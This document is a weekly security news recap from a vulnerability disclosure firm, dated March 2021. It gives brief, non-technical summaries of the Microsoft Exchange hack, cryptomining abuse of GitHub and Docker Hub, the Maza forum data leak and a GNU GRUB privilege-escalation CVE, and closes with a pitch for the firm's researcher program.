SSD’s Security Disclosure weekly news recap — March 11, 2021
This is SSD’s weekly security recap.
In this edition, we’ll talk about the Microsoft vulnerabilities affecting governments around the world, GitHub and Docker Hub used for crypto mining attacks, User Data exposed Online from the Maza Cybercrime Forum, and our CVE of the week: GNU GRUB elevated access.
The Microsoft Exchange Hack
After the SolarWinds attack that has been troubling the US, this new threat has been putting US organizations like credit unions, town governments, and small businesses at potential risk.
Of course, this vulnerability may also be used against organizations in Asia and Europe.
It was found that vulnerabilities in Microsoft exchange servers, allowed attackers to do two things: impersonate a user in the system and upload arbitrary c# code to the server opening a backdoor allowing them to run arbitrary commands.
Microsoft has released a patch correcting these vulnerabilities but it does not remove the backdoor installed. This is why the US government is looking into affected organizations in order to help them remove the backdoors.
Cyberhackers Using GitHub and Docker Hub for Cryptomining
Cyberhackers have been using GitHub and Docker Hub for illicit crypto mining hacking campaigns. This was discovered last week by the cybersecurity group, Aqua Security.
GitHub and Docker Hub are two platforms designed for cloud-based computing where companies and independent developers can build, ship, and maintain their software.
Illicit crypto-mining leverages resources stolen from victims to mine cryptocurrencies on behalf of criminals.
This campaign is targeting the automated build processes of GitHub and Docker Hub, which is an extension to a campaign discovered in September 2020.
The attackers created 92 malicious Docker repositories and 92 Bitbucket. The idea behind these repositories and Bitbuckets was to abuse the processing power of the platforms for crypto mining.
Researchers at Aqua advised these platforms to promote stricter access controls along with increased monitoring of users' accounts.
Maza Cybercrime Forum’s Users’ Details Leaked
The infamous Maza Cybercrime Forum, one of the oldest underground cybercrime forums, was breached, its forum leaked, including the details of around 3,000 users in a PDF file posted on the forum’s front page.
The forum, launched in 2003, has served as a place to trade stolen credit card details, e-commerce fraud, bank fraud, and other illicit activities.
According to the leaked PDF file, details such as usernames, emails, account passwords, social media IDs were posted online, alongside information about each user’s certificate file and password, used in the forum.
While the Maza leak is small in size compared to other data breaches this year, it is likely one of the most important security incidents of 2021, as it has led to the broad exposure of data that can aid law enforcement agencies in tracking down former or current cybercriminals.
The GNU GRUB Vulnerability
Finally, our CVE of the week, a vulnerability found in GNU GRUB allowing a local user on a Linux system to manipulate the grub process, in a way allowing him to gain elevated access the next time the software is run.
GNU GRUB is a Multiboot boot loader, part of the GNU Project that is a free operating system that allows its users to run, copy, explore and change programs’ source code freely.
The vulnerability here used the detection mechanism of GNU on Linux and forced the installation to generate a new cfg file, based on false info, allowing a local user to cause the system to execute arbitrary commands.
We urge administrators of shared hosting servers to upgrade to the latest version of GRUB as soon as possible to mitigate this danger.
Want to Be Part of the News?
At SSD, we help security researchers turn their skills in uncovering security vulnerabilities into a career. Designed by researchers, for researchers, SSD provides the fast response and support needed to get zero-day vulnerabilities and disclosures reported to vendors and to get researchers the compensation they deserve. We help researchers get to the bottom of vulnerabilities affecting major operating systems, software, or devices.
We are constantly publishing our findings, intended on educating our global security researcher’s community. You can find more vulnerabilities on our Advisories page. If you have findings of your own you can send us your findings here using our report template.
